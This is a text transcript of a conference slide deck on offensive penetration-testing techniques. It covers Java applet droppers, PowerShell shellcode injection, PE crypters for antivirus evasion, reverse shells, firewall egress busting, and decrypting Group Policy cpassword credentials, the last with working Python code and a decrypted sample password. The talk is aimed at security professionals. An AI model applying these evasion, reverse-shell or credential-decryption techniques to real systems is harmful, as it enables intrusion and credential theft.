How to Survive Security Summer Camp - Blackhat Defcon BSidesLV
BSIDESLV Secret Pentesting Techniques
-
Upload
barfangfangor -
Category
Documents
-
view
82 -
download
5
description
Transcript of BSIDESLV Secret Pentesting Techniques
![Page 1: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/1.jpg)
BSIDES Las Vegas
Secret Pentesting Techniques Shhh...
Dave Kennedy Founder, Principal Security Consultant
Email: [email protected] https://www.trustedsec.com
@TrustedSec
![Page 2: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/2.jpg)
Introduc)on • As penetration testers, exploit
writers, huggers, etc. we have secret techniques we always use.
• Although some may or may not be public, they are generally obscure and not well known.
![Page 3: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/3.jpg)
• The purpose of today’s talk is
to show you my secrets.. Some of my techniques that I use that aren’t widely known.
• Why show you? I’m an open book on everything I do and sharing is what it’s all about.
![Page 4: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/4.jpg)
Technique #1 • Java Applet Attack (SET) – Well
known attack method right?
• Do you know how it actually works?
• Do you know the techniques behind it to make it successful?
![Page 5: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/5.jpg)
ZOMG APT • News agencies around the
world discovered a new and extremely advanced zero-day exploit against Java.
• Made me feel kind of special =)
• How people found out it was set?
![Page 6: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/6.jpg)
ILIKEHUGS
![Page 7: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/7.jpg)
DEMO:
Walking through the Attack
![Page 8: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/8.jpg)
Explaining the Applet • Parameters that are
injected into the HTML code are pulled from the Applet.
• Obfuscated and randomized each time.
• Parameters tell the Applet which attacks to use.
![Page 9: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/9.jpg)
Method 1 – Binary Dropper • Binary is downloaded from attacker machine via web server (Java
downloader)
• Obfuscated binary each time per deployment.. Combination of PE manipulation, UPX, and rewriting binary on fly (import pefile)
![Page 10: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/10.jpg)
DEMO:
Binary Dropping Technique
![Page 11: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/11.jpg)
Method 1 – Weak Sauce • Binary’s are easily picked up
by AV if signatures focus on obfuscation techniques. (SET changes them each version)
• Direct interaction with Windows file system and writing to disk.
• Multiple points of evidence on victim machine.
![Page 12: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/12.jpg)
Method 2 – Shellcodeexec • Shellcodeexec method drops a
custom compiled and modified version of shellcodeexec by Bernardo Damele.
• Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space.
• Alphanumeric shellcode is executed in memory and payload is delivered.
![Page 13: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/13.jpg)
DEMO:
ShellcodeExec
![Page 14: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/14.jpg)
Method 2 – Easily detectable • Shellcodeexec is a simple yet
awesome method but still has a number of drawbacks.
• Like Method 1 – Binary’s can be picked up unless custom version created. Direct interaction with Windows file system and writing to disk.
• Like Method 1 - Multiple points of evidence on victim machine.
![Page 15: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/15.jpg)
Method 3 – Powershell Injec)on • Detect if Powershell is installed
(installed by default on Vista and Windows 7 and 8).
• Powershell gives us complete flexibility on a number of post exploitation situations.
• Technique discovered by Matthew Graeber (you rock).
![Page 16: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/16.jpg)
Method 3 – PS ShellCode Injec)on • Applet detects if powershell
is installed on system.
• Grabs the operating system type (x86 / x64)
• Deploys Shellcode straight through powershell.
![Page 17: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/17.jpg)
DEMO:
ShellcodeExec
![Page 18: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/18.jpg)
Method 3 – Powershell Injec)on • Never touches disk – AV /
HIPS signatures go out the door.
• Obfuscated each time so that memory inspection is extremely difficult.
• Extremely reliable and stable.
![Page 19: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/19.jpg)
PE Security Evasion
![Page 20: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/20.jpg)
Scenario 1 – Dropping PE’s like its hot • Your using Metasploit – All of
them are being picked up by AV, HIPS, etc.
• Most cases, I will rewrite the exe template for Metasploit to customize binary for evasion.
• Couple cool ways to do this.
![Page 21: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/21.jpg)
Modifying PE For Evasion in MSF • Easiest way for me is to make
a simple program that creates a RWX process then have the program execute Metasploit Shellcode.
• You can also modify the
Metasploit exe.rb template and obfuscate the code that way.
![Page 22: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/22.jpg)
PE Crypters • One of my favorites was
recently released called Hyperion (Christian Ammann from nullsecurity.net).
• Encrypts PE the file using a randomized simple cipher key with AES 128.
• When executable is run, it brute forces the AES key then decrypts the PE file for you.
![Page 23: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/23.jpg)
DEMO: Hyperion
![Page 24: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/24.jpg)
Hyperion Encryp)on • Very cool concept and easy
to use and write one for yourself.
• Ability to have a completely unique PE file each time.
• Slight downfall, stub used for brute force is not polymorphic.
![Page 25: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/25.jpg)
Building a Simple Reverse Shell
![Page 26: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/26.jpg)
The Reverse Shell
• Connects out to the attacker (reverse shell).
![Page 27: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/27.jpg)
Compiling Binaries
• PyInstaller – Compiles python code for you into a binary by wrapping the Python Interpreter into the executable.
• Works on Linux, OSX, and Windows.
python Configure.py python Makespec.py –onefile –noconsole shell.py python Build.py shell/shell.spec cd shell\dist
![Page 28: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/28.jpg)
Making it easy – pybuild.py
• All code and samples will be released on the TrustedSec website soon.
![Page 29: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/29.jpg)
DEMO: Building a Shell
![Page 30: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/30.jpg)
Bypassing AV
![Page 31: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/31.jpg)
Finding your way home
![Page 32: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/32.jpg)
Bumping the Firewall • A number of companies
restrict ports outbound and only allow what’s needed for the business.
• Trouble getting payloads out, especially if you only have one shot.
![Page 33: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/33.jpg)
Egress Bus)ng • Few ways to do it, pre-staged
payload for identifying way out.
• Attempt staged reverse on every port.
• Metasploit has an ALLPORTS payload as well.
![Page 34: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/34.jpg)
Egress Buster 0.2 • Server/Client situation where
victim connects out on every port 1024 ports at a time.
• Server listens for connection and reports back.
• Here’s where you can have some fun.
![Page 35: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/35.jpg)
Egress Buster Reverse Shell
![Page 36: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/36.jpg)
Egress Buster Reverse Shell • Released this week!
• Allows you to bust all ports inside the firewall and spawn a command shell.
• Custom, so no AV picks this up. Byte compiled into an executable.
![Page 37: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/37.jpg)
DEMO:
Egress Buster Reverse Shell
![Page 38: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/38.jpg)
Egress Buster Reverse Shell Usage • Recent Penetration Test – Found
file upload + execute binary’s.
• Could not find a standard port out i.e. 80, 443, 53, 25, etc.
• Wrote this to deploy and found several obscure ports that were allowed.
![Page 39: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/39.jpg)
Fun with Group Policy
![Page 40: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/40.jpg)
One of my PERSONAL Favorites • How many times have we been on a
pentest with just a domain user?
• Need that local administrator account for all of the domain computers?
Research from: Sogeti ESEC Pentest Article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
![Page 41: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/41.jpg)
The AZack • Navigate to a domain controller
and hit up the SYSVOL share.
• Head to the domain name and Policies folder.
• Look for a GUID then MACHINE\Preferences\Group.
• Look for the Groups.xml file.
![Page 42: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/42.jpg)
Contents of File
![Page 43: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/43.jpg)
Sta)c Key for AES Anyone?
![Page 44: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/44.jpg)
Python Code # code was developed and created from # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences from Crypto.Cipher import AES from base64 import b64decode key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex') cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=") o = AES.new(key, 2).decrypt(cpassword) print o[:-ord(o[-1])].decode('utf16')
![Page 45: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/45.jpg)
Decrypted Password
>>> print o[:-ord(o[-1])].decode('utf16') Local*P4ssword!
![Page 46: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/46.jpg)
Expanding on Group.xml
![Page 47: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/47.jpg)
More Passwords Stored • The folks over at rewt dance (
http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute.
• Services, ScheduledTasks, SQL servers and much more are impacted.
![Page 48: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/48.jpg)
List of Other Affected Areas (from rewt dance)
Services\Services.xml http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13) ScheduledTasks\ScheduledTasks.xml http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13) http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13) http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13) Printers\Printers.xml http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13) Drives\Drives.xml http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13) DataSources\DataSources.xml http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
![Page 49: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/49.jpg)
There’s a ton more of these…
Hopefully can make these a series.
![Page 50: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/50.jpg)
![Page 51: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/51.jpg)
Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
![Page 52: BSIDESLV Secret Pentesting Techniques](https://reader030.fdocuments.net/reader030/viewer/2022012402/55cf9cb0550346d033aab207/html5/thumbnails/52.jpg)
Secret Pentesting Techniques Shhh...
Dave Kennedy Founder, Principal Security Consultant
Email: [email protected] https://www.trustedsec.com
TrustedSec, LLC @TrustedSec